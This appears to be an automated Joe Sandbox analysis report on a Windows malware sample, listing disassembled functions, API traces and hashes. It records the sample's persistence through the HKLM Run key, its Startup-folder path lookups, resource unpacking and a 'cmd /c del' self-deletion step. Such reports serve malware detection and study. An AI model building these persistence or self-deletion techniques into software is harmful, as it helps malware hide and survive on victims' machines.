                                        • GetEnvironmentVariableA.KERNEL32(ComSpec,0040F450,00000500,00000000,0040B450,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA), ref: 00401444
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$EnvironmentFileModuleNameVariable
                                        • String ID: ComSpec$PathAddBackslashA$PathFindFileNameA$RegCloseKey$RegCreateKeyExA$RegSetValueExA$RtlDecompressBuffer$SHGetSpecialFolderPathA$Shell32.dll$ShellExecuteA$advapi32.dll$ntdll.dll$shlwapi.dll
                                        • API String ID: 3647900824-1083084054
                                        • Opcode ID: 6ef7ec11d9fb8a3ad29c85a516843b12afa07f7b7a4480054501895f0df25c09
                                        • Instruction ID: 1a3f60b94c72a3d764b465012e8e4006d7b5de4556887a89fcf71d3449609cad
                                        • Opcode Fuzzy Hash: 6ef7ec11d9fb8a3ad29c85a516843b12afa07f7b7a4480054501895f0df25c09
                                        • Instruction Fuzzy Hash: 55118FB0786344ADE611BF22AC03AA53E75E790B05B10C43BB444755FAE7FD59B19B0C
                                        Function 00401AD8 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 100 401ad8-401b02 GetCommandLineA GetModuleHandleA GetProcessHeap 101 401b0d-401b0f ExitProcess 100->101 102 401b08 call 401000 100->102 102->101
                                        APIs
                                        • GetCommandLineA.KERNEL32 ref: 00401AD8
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401AE4
                                        • GetProcessHeap.KERNEL32(00000000), ref: 00401AEE
                                          • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                          • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                          • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                          • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                          • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                          • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                          • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                          • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                          • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                        • String ID:
                                        • API String ID: 673778540-0
                                        • Opcode ID: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
                                        • Instruction ID: 8dce49216dd7d9d4199a49ca56cfbc69a4ccef7545e9a5bd4d655d6bb2b69eda
                                        • Opcode Fuzzy Hash: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
                                        • Instruction Fuzzy Hash: 50E06774A45300AAE7217F71AE02B193E75A74174AF00007BB601791F6EBB86A109B5D
                                        Function 00401169 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 118 401169-401176 GetPEB 119 401178-401b0f ExitProcess 118->119 120 40117d 118->120
                                        APIs
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 714ab66ee6a437a4e7e531f558f1893001c0bd575ffc3dde3890ca7ea888f759
                                        • Instruction ID: 6052738ef485299c3c4fdb0b236ee7e135dca6718f0a2ea55ee82b8d7645fc1e
                                        • Opcode Fuzzy Hash: 714ab66ee6a437a4e7e531f558f1893001c0bd575ffc3dde3890ca7ea888f759
                                        • Instruction Fuzzy Hash: 22C02B3420C304CBD216DB84C745B003330FB00F02F400077A200259F2837C7800D94F
                                        Function 00401157 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 114 401157-401161 GetPEB 115 401163 114->115 116 401168 114->116 117 401b0d-401b0f ExitProcess 115->117 116->117
                                        APIs
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: b3c74884984f365968fc207d099f3b1e189d9239c5d3ccd66837152c84ea0862
                                        • Instruction ID: 5b4a1a1b9248d86d75d5b6903a42a4fd48aa6b016996c6b0739733c6a8f7b2a9
                                        • Opcode Fuzzy Hash: b3c74884984f365968fc207d099f3b1e189d9239c5d3ccd66837152c84ea0862
                                        • Instruction Fuzzy Hash: CDC02B3810C380CAD31BC364864AB017271A700F02F8480B3E201244F2437C6D40C20F
                                        Function 00401189 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 118COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401199
                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 004011AF
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: Resource$ExitFindProcessSizeof
                                        • String ID: 4UB
                                        • API String ID: 1411291463-2201820659
                                        • Opcode ID: 2951c3ceb8ed4102f800c93b197117d063b6b0fade13dfe354e7c0c7c61d492e
                                        • Instruction ID: 54916fd416a240242440a09587848b99c6951bb24d46c27558f3872607dfc3e1
                                        • Opcode Fuzzy Hash: 2951c3ceb8ed4102f800c93b197117d063b6b0fade13dfe354e7c0c7c61d492e
                                        • Instruction Fuzzy Hash: 1A4101B0A40204EFEB40DFA5ED81BA93BB4F754345F10857AF501BA2B1E7B46DA0DB19
                                        Function 00401000 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 67windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                        • RegisterClassExA.USER32(00000030), ref: 0040106E
                                        • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                        • ShowWindow.USER32(00000001,?), ref: 004010BC
                                        • UpdateWindow.USER32(00000001), ref: 004010C7
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                        • TranslateMessage.USER32(?), ref: 004010E4
                                        • DispatchMessageA.USER32(?), ref: 004010ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                        • String ID: 0$WinClass32
                                        • API String ID: 282685165-2329282442
                                        • Opcode ID: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
                                        • Instruction ID: 47d6b7d35728adeecb0fde599aadb8774aba34f0bad3284053c57367e6fa7a97
                                        • Opcode Fuzzy Hash: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
                                        • Instruction Fuzzy Hash: 7D210C70D41249AAEF10EFD0CC46BDDBFB8AB04708F20802AF200BA1E5D7B96655DB5C
                                        Function 004010FB Relevance: 4.5, APIs: 3, Instructions: 30windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 103 4010fb-401108 104 401111-401115 103->104 105 40110a call 4014cb 103->105 107 401117-40112d call 401340 SendMessageA 104->107 108 40112f-401133 104->108 109 40110f 105->109 111 401142-401154 DefWindowProcA 107->111 108->111 112 401135-40113f PostQuitMessage 108->112 109->111
                                        APIs
                                        • SendMessageA.USER32(?,00009D99,00000000,00000000), ref: 00401128
                                        • DefWindowProcA.USER32(?,00000002,?,?), ref: 0040114E
                                          • Part of subcall function 004014CB: GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 004014DC
                                          • Part of subcall function 004014CB: PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 004014E6
                                          • Part of subcall function 004014CB: GetWindowsDirectoryA.KERNEL32(00404450,00001000), ref: 004014F6
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00404450,00404450,00001000), ref: 00401500
                                          • Part of subcall function 004014CB: GetTempPathA.KERNEL32(00001000,00405450), ref: 00401510
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00405450,00001000,00405450), ref: 0040151A
                                          • Part of subcall function 004014CB: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 0040152C
                                          • Part of subcall function 004014CB: PathFindFileNameA.SHLWAPI(C:\Users\user\Desktop\,00000000,C:\Users\user\Desktop\,00000200), ref: 00401536
                                          • Part of subcall function 004014CB: GetEnvironmentVariableA.KERNEL32(APPDATA,00407450,00001000), ref: 0040154E
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00407450,APPDATA,00407450,00001000), ref: 00401558
                                          • Part of subcall function 004014CB: SHGetSpecialFolderPathA.SHELL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\,00000007,00000001), ref: 00401569
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\), ref: 00401574
                                          • Part of subcall function 004014CB: SHGetSpecialFolderPathA.SHELL32(00000000,00409450,00000010,00000001), ref: 00401585
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00409450), ref: 00401590
                                          • Part of subcall function 004014CB: FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 004015B4
                                          • Part of subcall function 004014CB: ExitProcess.KERNEL32(00000000,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000,00406450,00410060), ref: 00401A06
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: Path$Backslash$DirectoryFileFindFolderNameSpecial$EnvironmentExitMessageModuleProcProcessResourceSendSystemTempVariableWindowWindows
                                        • String ID:
                                        • API String ID: 3165515907-0
                                        • Opcode ID: 6e41b82b1a59110096b7f5e1eaf1704465141be8ffeca4895ea9e4f7652cdaec
                                        • Instruction ID: 0d19c5dcc5aa2c104d2bcf641a834dc402774fcf6836afafd324fc60c71b67c5
                                        • Opcode Fuzzy Hash: 6e41b82b1a59110096b7f5e1eaf1704465141be8ffeca4895ea9e4f7652cdaec
                                        • Instruction Fuzzy Hash: 0BF08C31240208B7CF25AE628C03B8A37629B04719F10C03BFB193C0F297BDE660DA5E

                                        Non-executed Functions

                                        Function 0040144A Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 137 40144a-401451 138 401454-401461 137->138 138->138 139 401463-401465 138->139
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                        • Instruction ID: 8fa38f81e8242696ce0cc31d39bb87820c0085d6c7506b9eb7d826ca0eb98f77
                                        • Opcode Fuzzy Hash: a9990774af4119fa70ef41400092c50f263bdf1d164bc37f887e3c0d7a250b32
                                        • Instruction Fuzzy Hash: 52C012B711004827DB089509D8429D6B798D6B5365718811BF906DE292E97CE941C5A4
                                        Function 00401A10 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 22stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 123 401a10-401a6e lstrcpyA lstrcatA * 4 ShellExecuteA
                                        APIs
                                        • lstrcpyA.KERNEL32(0040D450), ref: 00401A15
                                        • lstrcatA.KERNEL32(0040D450,0040A450,0040D450), ref: 00401A24
                                        • lstrcatA.KERNEL32(0040D450," ",0040D450,0040A450,0040D450), ref: 00401A33
                                        • lstrcatA.KERNEL32(0040D450,0040B450,0040D450," ",0040D450,0040A450,0040D450), ref: 00401A42
                                        • lstrcatA.KERNEL32(0040D450," >> NUL,0040D450,0040B450,0040D450," ",0040D450,0040A450,0040D450), ref: 00401A51
                                        • ShellExecuteA.SHELL32(00000000,00000000,0040F450,0040D450,00000000,00000000), ref: 00401A68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: lstrcat$ExecuteShelllstrcpy
                                        • String ID: " "$" >> NUL
                                        • API String ID: 742256116-2884213582
                                        • Opcode ID: f7b28a052863698766e7caa9bcc0667b7caf2ac5db88afa528486488b0d02c9d
                                        • Instruction ID: c67f771b86db4121d1babd1f488120d3e12b037d12f8b34daf4744ac84752cfb
                                        • Opcode Fuzzy Hash: f7b28a052863698766e7caa9bcc0667b7caf2ac5db88afa528486488b0d02c9d
                                        • Instruction Fuzzy Hash: 84E0A27CBC434935D81036E10F07F5965258B54F1DF32803BB245385EB5AFCB118A02E
                                        Function 00401468 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,00410060,00000000), ref: 0040148B
                                        • lstrlenA.KERNEL32(Pd@`,00410660,0000000F), ref: 004014A0
                                        • RegSetValueExA.ADVAPI32(?,00410660,00000000,00000001,?,-00000001,Pd@`,00410660,0000000F), ref: 004014B8
                                        • RegCloseKey.ADVAPI32(?), ref: 004014C1
                                        Strings
                                        • Pd@`, xrefs: 0040149D
                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00401481
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID: Pd@`$Software\Microsoft\Windows\CurrentVersion\Run
                                        • API String ID: 1356686001-3638029297
                                        • Opcode ID: 0815aa4abac9622c084a24d5d1959e099eae3d3f69ea637e4f878cb797079dd3
                                        • Instruction ID: 694becdac4f8bd3b9b7976167e3761c6cf6cdd6dc00f17d18d4396d85fea8140
                                        • Opcode Fuzzy Hash: 0815aa4abac9622c084a24d5d1959e099eae3d3f69ea637e4f878cb797079dd3
                                        • Instruction Fuzzy Hash: 5EF030717C0308BBFB215B90DC07FED7A29AB50B04F204031B701B80E6CAF55AA0A65D
                                        Function 00401A92 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 17stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 127 401a92-401ad7 lstrcpyA lstrcatA * 2 ShellExecuteA
                                        APIs
                                        • lstrcpyA.KERNEL32(0040F950,/c del ",004019F4,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401A9C
                                        • lstrcatA.KERNEL32(0040F950,0040B450,0040F950,/c del ",004019F4,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002), ref: 00401AAB
                                        • lstrcatA.KERNEL32(0040F950," >> NUL,0040F950,0040B450,0040F950,/c del ",004019F4,?,?,?,?,00410694,00000000,00406450,C0000000,00000003), ref: 00401ABA
                                        • ShellExecuteA.SHELL32(00000000,00000000,0040F450,0040F950,00000000,00000000), ref: 00401AD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: lstrcat$ExecuteShelllstrcpy
                                        • String ID: " >> NUL$/c del "
                                        • API String ID: 742256116-2706327707
                                        • Opcode ID: a1070831e0bea9541da9ac62f5628a9e4d215df999206135537e60c8682be13e
                                        • Instruction ID: 00c8236249b174e54b049ae4d3aed823565817e79cb25063840e3e3a81eaf472
                                        • Opcode Fuzzy Hash: a1070831e0bea9541da9ac62f5628a9e4d215df999206135537e60c8682be13e
                                        • Instruction Fuzzy Hash: 23D0E9B43C430735E83036510E07F9559154754F1AF31803BB305389F25AFCB108621D

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:3.6%
                                        Total number of Nodes:784
                                        Total number of Limit Nodes:4
                                        execution_graph 18585 401000 memset GetModuleHandleA HeapCreate 18586 401044 18585->18586 18857 407470 HeapCreate RtlAllocateHeap 18586->18857 18588 401049 18858 406807 HeapCreate 18588->18858 18590 40104e 18859 406040 18590->18859 18598 401062 18877 40393b 18598->18877 18600 401067 18880 403694 6F551CD0 CoInitialize 18600->18880 18602 40106c 18881 403ef0 RtlAllocateHeap 18602->18881 18610 4010bf GetUserDefaultLangID VerLanguageNameA CharLowerA 18894 403de0 18610->18894 18612 4010fc 18898 4030f0 18612->18898 18616 401113 18617 40112a 18616->18617 18618 4011ff 18616->18618 19081 403108 18617->19081 18619 403108 4 API calls 18618->18619 18621 40120f 18619->18621 18623 403108 4 API calls 18621->18623 18625 40121f 18623->18625 18624 403108 4 API calls 18626 40114a 18624->18626 18627 403108 4 API calls 18625->18627 18628 403108 4 API calls 18626->18628 18629 40122f 18627->18629 18630 40115a 18628->18630 18632 403108 4 API calls 18629->18632 18631 403108 4 API calls 18630->18631 18633 40116a 18631->18633 18634 40123f 18632->18634 18635 403108 4 API calls 18633->18635 18636 403108 4 API calls 18634->18636 18637 40117a 18635->18637 18638 40124f 18636->18638 18639 403108 4 API calls 18637->18639 18640 403108 4 API calls 18638->18640 18642 40118a 18639->18642 18641 40125f 18640->18641 18643 403108 4 API calls 18641->18643 18644 403108 4 API calls 18642->18644 18645 40126f 18643->18645 18646 40119a 18644->18646 18647 403108 4 API calls 18645->18647 18648 403108 4 API calls 18646->18648 18649 40127f 18647->18649 18650 4011aa 18648->18650 18651 403108 4 API calls 18649->18651 18652 403108 4 API calls 18650->18652 18653 40128f 18651->18653 18654 4011ba 18652->18654 18655 403108 4 API calls 18653->18655 18656 403108 4 API calls 18654->18656 18657 40129f 18655->18657 18658 4011ca 18656->18658 18659 403108 4 API calls 18657->18659 18660 403108 4 API calls 18658->18660 18661 4012af 18659->18661 18662 4011da 18660->18662 18664 403108 4 API calls 18661->18664 18663 403108 4 API calls 18662->18663 18665 4011ea 18663->18665 18666 4012bf 